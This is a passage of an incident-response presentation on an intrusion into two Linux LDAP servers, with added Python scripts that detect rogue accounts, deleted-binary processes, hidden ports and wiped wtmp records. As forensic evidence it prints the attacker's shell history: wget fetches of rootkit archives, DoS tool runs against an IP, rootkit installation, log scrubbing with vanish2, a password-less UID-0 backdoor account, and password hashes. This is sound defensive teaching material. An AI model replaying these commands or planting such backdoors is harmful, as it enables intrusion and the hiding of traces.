11. Extract from /etc/passwd (more accounts followed; deleted by anand to shorten the presentation):

    ident:x:98:98:pident user:/:/bin/false
    rpc:x:32:32:Portmapper RPC user:/:/bin/false
    rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/bin/false
    xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
    admin:x:500:4::/home/admin:/bin/bash
    kid:x:2764:2764::/:/bin/bash
    ra:x:0:0::/:/bin/bash
    hacker:x:2765:2765::/var/hacker:/bin/bash

    And an extract from /etc/shadow:

    kid:$1$WlLTPQXq$tzU2usdhCMG3KQKAm4JKI0:11776:0:99999:7:::134538460
    ra::10865:0:99999:7:::134538460
    hacker:$1$L8/uol5e$FqL63oc0Z.s8K0WQkmdvK1:11786:0:99999:7:::
    [root@ldap2 log]#

    Note: ra has UID 0 (a second root) and an empty password field in shadow, so it logs in with no password at all; kid's home directory is / and hacker's is /var/hacker, not /home. Compare the ftp login as ra on the next slide.
12. Banner-grabbing both servers with ftp, then logging in as ra on ldap2:

    [anand@anand anand]$ ftp 1.2.3.1
    Connected to 1.2.3.1.
    220 ldap1 FTP server (Version wu-2.6.2(2) Sat Dec 22 15:48:35 EET 2001) ready.
    530 Please login with USER and PASS.
    530 Please login with USER and PASS.
    KERBEROS_V4 rejected as an authentication type
    [anand@anand anand]$ ftp 1.2.3.2
    Connected to 1.2.3.2.
    220 ldap2 FTP server (Version wu-2.6.1-16) ready.
    530 Please login with USER and PASS.
    530 Please login with USER and PASS.
    KERBEROS_V4 rejected as an authentication type
    Name (1.2.3.2:anand): ra
    331 Password required for ra.
    Password:
    230 User ra logged in.
    Remote system type is UNIX.
    Using binary mode to transfer files.
    ftp> ls
    227 Entering Passive Mode (1,2,3,2,138,61)
    150 Opening ASCII mode data connection for directory listing.
    total 240
    drwxr-xr-x    2 root     root         2048 Jun 10 07:02 bin
    drwxr-xr-x    3 root     root         1024 Sep 13  2001 boot
    ....

    Note: ra lands in / after login, which is its home directory in /etc/passwd.
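The account checks implied by the two slides above (a second UID 0 user, an empty shadow password field, home directories outside /home, and the shadow "last changed" day converted to a date for the timeline) as an added example; this is not code from the original presentation. The sample entries are the ones shown on slide 11, embedded so the script runs offline; on a live system call audit_accounts() on the real files (reading /etc/shadow needs root).

```python
"""Audit /etc/passwd and /etc/shadow for the kind of accounts found on ldap2."""
from datetime import date, timedelta

# Entries from slide 11, embedded as sample input (the real files are longer).
SAMPLE_PASSWD = """\
ident:x:98:98:pident user:/:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/bin/false
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
admin:x:500:4::/home/admin:/bin/bash
kid:x:2764:2764::/:/bin/bash
ra:x:0:0::/:/bin/bash
hacker:x:2765:2765::/var/hacker:/bin/bash
"""

SAMPLE_SHADOW = """\
kid:$1$WlLTPQXq$tzU2usdhCMG3KQKAm4JKI0:11776:0:99999:7:::134538460
ra::10865:0:99999:7:::134538460
hacker:$1$L8/uol5e$FqL63oc0Z.s8K0WQkmdvK1:11786:0:99999:7:::
"""

NOLOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin",
                  "/bin/sync", "/sbin/halt", "/sbin/shutdown"}
EPOCH = date(1970, 1, 1)


def parse_passwd(text):
    """name -> (passwd_field, uid, gid, home, shell)"""
    users = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            name, pw, uid, gid, _gecos, home, shell = line.split(":", 6)
            users[name] = (pw, int(uid), int(gid), home, shell)
    return users


def parse_shadow(text):
    """name -> (hash, lastchg_days or None)"""
    entries = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            f = line.split(":")
            entries[f[0]] = (f[1], int(f[2]) if f[2] else None)
    return entries


def lastchg_date(days):
    """Shadow field 3 counts days since 1970-01-01 (11776 -> 2002-03-30)."""
    return EPOCH + timedelta(days=days)


def timeline(shadow_text):
    """name -> date the password was last set; a proxy for account creation."""
    return {name: lastchg_date(d) for name, (_h, d) in parse_shadow(shadow_text).items()
            if d is not None}


def audit_accounts(passwd_text, shadow_text):
    """Return sorted (user, finding) pairs; findings are short codes."""
    users = parse_passwd(passwd_text)
    shadow = parse_shadow(shadow_text)
    findings, seen_uids = set(), {}
    for name, (pw, uid, _gid, home, shell) in users.items():
        interactive = shell not in NOLOGIN_SHELLS
        if uid == 0 and name != "root":
            findings.add((name, "uid0"))                    # a second root account
        if uid in seen_uids:
            findings.add((name, "dup_uid:" + seen_uids[uid]))
        seen_uids.setdefault(uid, name)
        if interactive and not (home.startswith("/home/") or home == "/root"):
            findings.add((name, "odd_home:" + home))        # lives in / or /var/...
        if pw == "" or (name in shadow and shadow[name][0] == ""):
            findings.add((name, "nopass"))                  # no password asked at all
    return sorted(findings)


if __name__ == "__main__":
    for user, finding in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{user:8s} {finding}")
    for user, when in sorted(timeline(SAMPLE_SHADOW).items()):
        print(f"{user:8s} password set {when}")
```

The dates come straight out of the shadow aging fields: kid and hacker were given passwords on 2002-03-30 and 2002-04-09, which lines up with the June 2002 timestamps elsewhere in the slides, while ra's field points to 1999, so its value is less trustworthy as a creation date.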
16. Hidden directories and the rootkit:

    [root@ldap1 /tmp]# ls -la /tmp
    total 9
    drwxrwxrwt    9 root     root         1024 Jun 24 10:48 .
    drwxr-xr-x    3 501      ftp          1024 Jun 17 03:41 .,

    [root@ldap2 mail]# cat /var/hacker/<tab>
    .bash_history  .bash_profile  .emacs  .screenrc  Mail  m.tgz
    .bash_logout   .bashrc        .kde    Desktop    a

    [root@ldap2 myrk]# cat ./<tab>
    .1addr   linsniffer  ps                ssh_random_seed  tcp.log
    .1file   lpd         pwd               sshd             utils
    .1proc   ls          sense             ssh_host_key     wipe
    hideps   netstat     ssh_host_key.pub  sshd_config
    install  new-host    string            sysinfo

    Notes: The directory ".," (dot-comma) was created by the intruder; its owner shows as the bare UID 501 (no account with that UID), group ftp. linsniffer stores its log in a file called tcp.log. I had to use "cat <tab>" (tab completion) since ls was trojaned and would not list anything at all!
17. A block copied from the lsof output:

    COMMAND  PID   USER  FD   TYPE DEVICE    SIZE  NODE NAME
    bnc     8214 hacker cwd    DIR   72,7       0 10082 /var/hacker/bnc2.6.4 (deleted)
    bnc     8214 hacker rtd    DIR   72,8    1024     2 /
    bnc     8214 hacker txt    REG   72,7   25784 10111 /var/hacker/bnc2.6.4/bnc (deleted)
    bnc     8214 hacker mem    REG   72,8  471781 44354 /lib/ld-2.2.2.so
    bnc     8214 hacker mem    REG   72,8  445289 44372 /lib/libnsl-2.2.2.so
    bnc     8214 hacker mem    REG   72,8  274054 44401 /lib/libresolv-2.2.2.so
    bnc     8214 hacker mem    REG   72,8   95362 44365 /lib/libcrypt-2.2.2.so
    bnc     8214 hacker mem    REG   72,8 5634864  4035 /lib/i686/libc-2.2.2.so
    bnc     8214 hacker   0u   CHR  136,0            2 /dev/pts/0
    bnc     8214 hacker   1u   CHR  136,0            2 /dev/pts/0
    bnc     8214 hacker   2u   CHR  136,0            2 /dev/pts/0
    bnc     8214 hacker   3u  IPv4       272344       TCP *:12300 (LISTEN)

    Note: He has installed and started an IRC bouncer (bnc) and then deleted its files; the process keeps running from the unlinked binary (lsof marks both its cwd and its txt as "(deleted)") and listens on TCP port 12300. Other such processes were sysd, running in place of sshd, and a fake nfsd (what was that meant for?).
18. netstat on ldap1:

    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address          State
    tcp        0      0 0.0.0.0:389             0.0.0.0:*                LISTEN
    tcp        0      0 0.0.0.0:22              0.0.0.0:*                LISTEN
    tcp        0      0 0.0.0.0:6010            0.0.0.0:*                LISTEN
    tcp        1      0 1.2.3.1:21              62.211.226.191:51221     CLOSE_WAIT
    tcp        0     48 1.2.3.1:22              mylaptop:40657           ESTABLISHED
    tcp        0      0 1.2.3.1:389             another_legitserver:4746 ESTABLISHED
    [root@ldap1 /root]#

    Note: Taken with my own copy of netstat. The FTP connection just hangs (CLOSE_WAIT), since the firewall is blocking outgoing FTP. See the IP 62.x.x.x in the Foreign Address column?
19. The tail of /etc/rc.d/rc.sysinit on ldap2:

    [root@ldap2 myrk]# tail -n 10 /etc/rc.d/rc.sysinit
        dmesg > /var/log/dmesg
        sleep 1
        kill -TERM `/sbin/pidof getkey` >/dev/null 2>&1
    } &
    if [ "$PROMPT" != "no" ]; then
        /sbin/getkey i && touch /var/run/confirm
    fi
    wait
    nfsd -q -p 54789

    Note: This nfsd is not a real NFS daemon! Being appended to rc.sysinit it is restarted on every boot. It listens for commands of some sort, though I could not figure out what exactly it was meant for.
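The two checks that slides 17 and 18 rely on, as an added example that is not code from the original presentation: a process whose executable was deleted after it started, and a listening port that lsof (or /proc) knows about but netstat does not print. parse_lsof() reads plain lsof text (the bnc lines are those from slide 17; the sshd lines and the netstat fragment are constructed as a benign control and as what a trojaned netstat might print). scan_proc() does the live version of the first check by reading /proc/<pid>/exe, which the kernel suffixes with " (deleted)" once the binary is unlinked.

```python
"""Find processes running from deleted binaries and ports netstat hides."""
import os
import re

# Constructed sample: bnc lines from slide 17, sshd lines added as a benign control.
SAMPLE_LSOF = """\
COMMAND  PID   USER  FD   TYPE DEVICE    SIZE  NODE NAME
bnc     8214 hacker cwd    DIR   72,7       0 10082 /var/hacker/bnc2.6.4 (deleted)
bnc     8214 hacker rtd    DIR   72,8    1024     2 /
bnc     8214 hacker txt    REG   72,7   25784 10111 /var/hacker/bnc2.6.4/bnc (deleted)
bnc     8214 hacker mem    REG   72,8 5634864  4035 /lib/i686/libc-2.2.2.so
bnc     8214 hacker   0u   CHR  136,0            2 /dev/pts/0
bnc     8214 hacker   3u  IPv4       272344       TCP *:12300 (LISTEN)
sshd     612   root txt    REG   72,8  262000 12001 /usr/sbin/sshd
sshd     612   root   3u  IPv4          873       TCP *:22 (LISTEN)
"""

# Constructed sample of what a trojaned netstat might print: port 12300 is missing.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:389             0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
"""

LISTEN_RE = re.compile(r"\b(TCP|UDP)\s+(\S+):(\d+)\s+\(LISTEN\)")
DELETED = " (deleted)"


def parse_lsof(text):
    """pid -> {cmd, user, deleted: [(fd, path)], listen: [(proto, port)]}"""
    procs = {}
    for line in text.splitlines():
        parts = line.split(None, 4)
        if len(parts) < 5 or not parts[1].isdigit():
            continue                                   # header or blank line
        cmd, pid, user, fd, rest = parts
        p = procs.setdefault(int(pid), {"cmd": cmd, "user": user, "deleted": [], "listen": []})
        m = LISTEN_RE.search(rest)
        if m:
            p["listen"].append((m.group(1), int(m.group(3))))
        elif rest.endswith(DELETED):
            path = rest[rest.find(" /") + 1:-len(DELETED)]   # NAME column without the marker
            p["deleted"].append((fd, path))
    return procs


def flag_processes(procs):
    """(pid, cmd, deleted executable, listening ports) for every unlinked-binary process."""
    out = []
    for pid, p in sorted(procs.items()):
        exe = [path for fd, path in p["deleted"] if fd == "txt"]
        if exe:
            out.append((pid, p["cmd"], exe[0], sorted(port for _, port in p["listen"])))
    return out


def netstat_listeners(text):
    """TCP ports in LISTEN state from `netstat -an` style output."""
    ports = set()
    for line in text.splitlines():
        f = line.split()
        if len(f) >= 6 and f[0].startswith("tcp") and f[-1] == "LISTEN":
            ports.add(int(f[3].rsplit(":", 1)[1]))
    return ports


def hidden_ports(procs, netstat_text):
    """Listening ports seen by lsof that the (possibly trojaned) netstat did not print."""
    seen = {port for p in procs.values() for _, port in p["listen"]}
    return sorted(seen - netstat_listeners(netstat_text))


def scan_proc(proc="/proc"):
    """Live check: pid -> original path for every process whose binary was unlinked."""
    hits = {}
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        try:
            target = os.readlink(os.path.join(proc, entry, "exe"))
        except OSError:                                # kernel thread, or not ours without root
            continue
        if target.endswith(DELETED):
            hits[int(entry)] = target[:-len(DELETED)]
    return hits


if __name__ == "__main__":
    procs = parse_lsof(SAMPLE_LSOF)
    for pid, cmd, path, ports in flag_processes(procs):
        print(f"pid {pid} ({cmd}) runs from deleted {path}, listening on {ports}")
    print("ports netstat did not show:", hidden_ports(procs, SAMPLE_NETSTAT))
    if os.path.isdir("/proc"):
        print("live /proc hits:", scan_proc())
```

The myrk kit on slide 16 replaces ps, ls and netstat in user space, so reading /proc directly from a clean interpreter bypasses it; a kernel-module rootkit would lie in /proc as well, and a trojaned lsof would too, which is why the tools should come from read-only media.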
20. The intruder's shell history on ldap2:

    [root@ldap2 myrk]# cat /var/hacker/.bash_history~
    wget http://www.angelfire.com/yt3/nblio/black.tar.gz;rm -r black.tar.gz
    exec ./a 8245
    wget http://www.angelfire.com/yt3/nblio/black.tar.gz;rm -r black.tar.gz
    ls
    rm -r m2.tar.gz
    perl udp.pl 62.0.115.207 0 0
    rm -r a.c
    ls
    gcc -o p packit.c
    ls
    ./p 62.0.115.207 0
    ./p 62.0.115.207 0
    ls

    Note: .bash_history itself was fine and showed only legitimate commands. I found a .bash_history~ (a backup created by vi, or did he copy it?) that shows the intruder's activity!
21. (continued)

    rm -r packit.c
    rm -r udp.pl
    rm -r p
    tar xvfz bnc2.6.4.tar.gz;cd bnc2.6.4;./configure;make;./bncsetup
    ./bncsetup
    ./bnc
    ./bnc
    ./bnc
    ./bnc
    killall -9 bnc
    ./bnc
    pico bnc.conf
    cd ..
    ls
    rm -r bnc2.6.4
    rm -r bnc2.6.4.tar.gz
    gcc -o a a.c;rm -r a.c;./a
    ls
    ./a
    ./a 1.2.3
22. (continued)

    ls
    rm -r a
    gcc -o a a.c;rm -r a.c;./a
    wget http://download.microsoft.com/download/win2000pro/Update/8.1/NT5/EN-US/DX81NTeng.exe;rm -r DX81NTeng.exe
    wget http://download.microsoft.com/download/win2000pro/Update/8.1/NT5/EN-US/DX81NTeng.exe;rm -r DX81NTeng.exe
    ls;w;ls
    wget http://download.microsoft.com/download/win2000pro/Update/8.1/NT5/EN-US/DX81NTeng.exe;rm -r DX81NTeng.exe
    ls;w
    wget http://home.dal.net/oc248/m.tgz

    Note: Why download DirectX from Microsoft, three times, deleting it each time? What was he trying to do? There is nothing at home.dal.net now.
23. (continued)

    wget http://www.angelfire.com/yt3/nblio/black.tar.gz;rm -r black.tar.gz
    exec ./a 12355
    exec ./a 12373
    cd myrk; pico install; cd myrk
    ./install
    ./a
    wget http://home.dal.net/oc248/m.tgz
    ls
    tar xvfz m.tgz
    ./a
    exec ./a 20689
    cd myrk
    pico install
    cd ..
    ./a
    mutt;exit
    [root@ldap2 myrk]#

    Note: myrk is the rootkit directory listed on slide 16; he edits its install script with pico and runs it. The file black.tar.gz is still available at angelfire. Go get it if you want to analyse it further.
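Reading a recovered history by hand, as done on slides 20 to 23, scales badly; below is an added example (not code from the original presentation) that pulls the indicators out mechanically: URLs fetched, IP addresses handed to the DoS tools, binaries compiled and then stripped of their source, archives unpacked, and the numbers passed to "exec ./a". SAMPLE_HISTORY is an abridged copy of the .bash_history~ shown on the slides, embedded so the script runs offline. Treating the number after "exec ./a" as a listening port is an assumption; the slides never say what a does.

```python
"""Pull indicators out of a recovered shell history."""
import re

# Abridged copy of /var/hacker/.bash_history~ from slides 20-23 (sample input).
SAMPLE_HISTORY = """\
wget http://www.angelfire.com/yt3/nblio/black.tar.gz;rm -r black.tar.gz
exec ./a 8245
perl udp.pl 62.0.115.207 0 0
rm -r a.c
gcc -o p packit.c
./p 62.0.115.207 0
rm -r packit.c
rm -r udp.pl
rm -r p
tar xvfz bnc2.6.4.tar.gz;cd bnc2.6.4;./configure;make;./bncsetup
./bnc
rm -r bnc2.6.4
gcc -o a a.c;rm -r a.c;./a
wget http://download.microsoft.com/download/win2000pro/Update/8.1/NT5/EN-US/DX81NTeng.exe;rm -r DX81NTeng.exe
wget http://home.dal.net/oc248/m.tgz
exec ./a 12355
tar xvfz m.tgz
cd myrk; pico install; cd myrk
./install
exec ./a 20689
mutt;exit
"""

IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
FETCHERS = {"wget", "curl", "lynx", "fetch", "ncftpget"}


def split_commands(line):
    """'a;b && c | d' -> ['a', 'b', 'c', 'd']: one simple command per element."""
    return [c.strip() for c in re.split(r"\s*(?:;|&&|\|\||\|)\s*", line) if c.strip()]


def extract_iocs(history_text):
    """Return a dict of indicators found in the history text."""
    downloads, archives, exec_args = [], [], []
    targets, deleted, compiled = set(), set(), {}
    for line in history_text.splitlines():
        for cmd in split_commands(line):
            argv = cmd.split()
            prog, args = argv[0], argv[1:]
            plain = [a for a in args if not a.startswith("-")]
            if prog in FETCHERS:
                downloads.extend(plain)                          # URLs to block or to fetch for analysis
            elif prog == "gcc" and "-o" in args:
                out = args[args.index("-o") + 1]
                compiled[out] = next((a for a in args if a.endswith(".c")), None)
            elif prog == "rm":
                deleted.update(plain)
            elif prog == "tar" and args and "x" in args[0]:
                archives.extend(a for a in args[1:] if not a.startswith("-"))
            elif prog == "exec" and len(plain) >= 2 and plain[1].isdigit():
                exec_args.append((plain[0], int(plain[1])))      # assumed: backgrounded listener
            else:
                targets.update(a for a in args if IPV4_RE.match(a))  # hosts given to the DoS tools
    return {
        "downloads": list(dict.fromkeys(downloads)),             # deduplicated, order kept
        "targets": targets,
        "compiled": compiled,                                    # binary -> source file
        "deleted": deleted,
        "compile_and_delete": sorted(b for b, s in compiled.items() if s in deleted),
        "archives": archives,
        "exec_args": exec_args,
    }


if __name__ == "__main__":
    for key, value in extract_iocs(SAMPLE_HISTORY).items():
        print(f"{key}: {value}")
```

The compile_and_delete list is the one worth acting on first: those binaries (p and a here) exist only on disk, or only in memory once their files are removed too, so they must be carved from the disk image or the running process rather than rebuilt from source.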
24. A numbered shell history (lines 269-286):

    269  ipconfig
    270  ifconfig
    271  exirt
    272  exit
    273  cd costy
    274  ls
    275  id
    276  cd logdel/
    277  export blah=freekevin
    278  ./vanish2 sysd ti221110a080-0520.bb.online.no 80.213.2.8
    279  cd /home/
    280  ls
    281  cd TTX/
    282  ls; cd ..
    284  cd admin/
    285  ls
    286  cd Desktop/

    Note: sysd is the name of the fake sshd seen on slide 17; the hostname and IP given to vanish2 are presumably the address he came in from, to be scrubbed from the logs.
25. (continued, lines 304-323)

    304  cd root/
    305  ls
    306  last
    307  cd /tmp/.,
    308  ls
    309  rm -rf chmrk-0.3.tgz
    310  cd .,
    311  ls
    312  cd /etc/
    313  cat passwd
    314  who
    314  who
    315  pico passwd
    316  export TERM=vt100
    317  pico passwd
    318  pico shadow
    319  cd /var/tmp
    320  mkdir .,
    321  cd .,
    322  ls
    323  wget www.geocities.com/freeaxcess/chmrk-0.9.tgz

    Note: He edits /etc/passwd and /etc/shadow by hand with pico (compare the accounts on slide 11) and creates "., " directories under /tmp and /var/tmp (compare slide 16).
26. (continued, lines 324-342)

    324  wget www.geocities.com/freeaxcess/chmrk-0.9.tgz
    325  ping www.geocities.com
    326  cd /tmp/.,
    327  la; ls ; cd ., ; ls
    331  alias ls="ls --color=always"
    332  ls -la
    333  cd logdel
    334  ls
    335  ./vanish2
    336  expotr blah=768
    337  export blah=768
    338  ls
    339  ./vanish2
    340  export blah768=freekevin
    341  ./vanish2
    342  ./vanish2 sysd crionized.net 217.8.139.50

    Note: vanish2 is used to erase any traces left behind (syslogs, utmp, wtmp etc.).
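A check for the log cleaning described on slides 24 to 26, as an added example that is not code from the original presentation. Cleaners of the zap/vanish family commonly overwrite the offending utmp/wtmp record with zeros instead of truncating the file, which leaves an all-zero record (ut_type EMPTY, which never occurs in normal wtmp) between otherwise valid entries; that vanish2 behaves this way is an assumption here, the slides only say that it erases traces. The record layout is glibc's 384-byte struct utmp on little-endian x86/x86-64 (other libcs and architectures differ); the sample wtmp is constructed inline, using the IP from slide 24 as the "intruder" host.

```python
"""Look for wiped records in a Linux wtmp file."""
import struct

# glibc struct utmp (384 bytes, x86/x86-64 little-endian): ut_type, pad, ut_pid,
# ut_line[32], ut_id[4], ut_user[32], ut_host[256], ut_exit (2 shorts),
# ut_session, ut_tv.tv_sec, ut_tv.tv_usec, ut_addr_v6[4], __unused[20]
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20s"
UTMP_SIZE = struct.calcsize(UTMP_FMT)            # 384
EMPTY, USER_PROCESS, DEAD_PROCESS = 0, 7, 8


def _field(value, size):
    return value.encode()[:size].ljust(size, b"\0")


def pack_record(ut_type, pid, line, user, host, tv_sec):
    """Build one utmp record (used only to construct the sample file)."""
    return struct.pack(UTMP_FMT, ut_type, pid, _field(line, 32), _field(line[-4:], 4),
                       _field(user, 32), _field(host, 256), 0, 0, 0, tv_sec, 0,
                       0, 0, 0, 0, b"\0" * 20)


def wipe_record(data, off):
    """What a zap-style cleaner does: zero the record in place, keep the file length."""
    return data[:off] + b"\0" * UTMP_SIZE + data[off + UTMP_SIZE:]


def iter_records(data):
    """Yield (offset, record dict) for every complete record in the file."""
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        yield off, {
            "type": f[0],
            "pid": f[1],
            "line": f[2].rstrip(b"\0").decode(errors="replace"),
            "user": f[4].rstrip(b"\0").decode(errors="replace"),
            "host": f[5].rstrip(b"\0").decode(errors="replace"),
            "tv_sec": f[9],
        }


def find_wiped(data):
    """Offsets of all-zero records, records whose time runs backwards, and any tail."""
    zeroed, out_of_order, last = [], [], 0
    for off, rec in iter_records(data):
        if data[off:off + UTMP_SIZE] == b"\0" * UTMP_SIZE:
            zeroed.append(off)                   # EMPTY record in an append-only log
            continue
        if rec["tv_sec"] < last:
            out_of_order.append(off)             # file was edited, not just appended to
        last = rec["tv_sec"]
    return {"zeroed": zeroed, "out_of_order": out_of_order,
            "trailing_bytes": len(data) % UTMP_SIZE}


def build_sample():
    """Constructed wtmp: admin logs in, the intruder logs in, admin logs out; then the
    intruder's record is wiped the way a cleaner would do it."""
    data = b"".join([
        pack_record(USER_PROCESS, 2711, "pts/0", "admin", "mylaptop", 1024900000),
        pack_record(USER_PROCESS, 2745, "pts/1", "hacker", "80.213.2.8", 1024900100),
        pack_record(DEAD_PROCESS, 2711, "pts/0", "", "", 1024900500),
    ])
    return wipe_record(data, 1 * UTMP_SIZE)


SAMPLE_WTMP = build_sample()

if __name__ == "__main__":
    for off, rec in iter_records(SAMPLE_WTMP):
        print(off, rec["type"], rec["user"] or "-", rec["host"] or "-", rec["tv_sec"])
    print(find_wiped(SAMPLE_WTMP))
    # On a live box: find_wiped(open("/var/log/wtmp", "rb").read())
```

A zeroed record only tells you that something was removed and roughly when (from the neighbouring timestamps); pairing it with the sniffer log, the firewall's connection log or a remote syslog is what recovers the address that was scrubbed.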
30. File details of the mass-rooter kit:

    [anand@aries massrooter]$ ls
    1*      lpd.conf   packet.pl   s*         ssh/         wum.c     ybsd*   YRH*
    bind/   Makefile   portscan.c  scan*      targets      wus*      YBSD*   YRH.c
    brute*  p*         pscan.c     scan.conf  targets.txt  wus.c     YBSD.c
    ftpd/   packet*    r00t*       sec*       wu*          xinetd*   ylpd*
    lpd/    packet.c   rpc/        src/       wum*         xinetd.c  ylpd.c
    [anand@aries massrooter]$

    Notes: wum, wus and ftpd/ contain FTP exploits; similar comments apply to lpd, bind, rpc etc. packet.pl is a DoS tool. r00t is a script that runs the attacks against the selected hosts (presumably those listed in targets / targets.txt).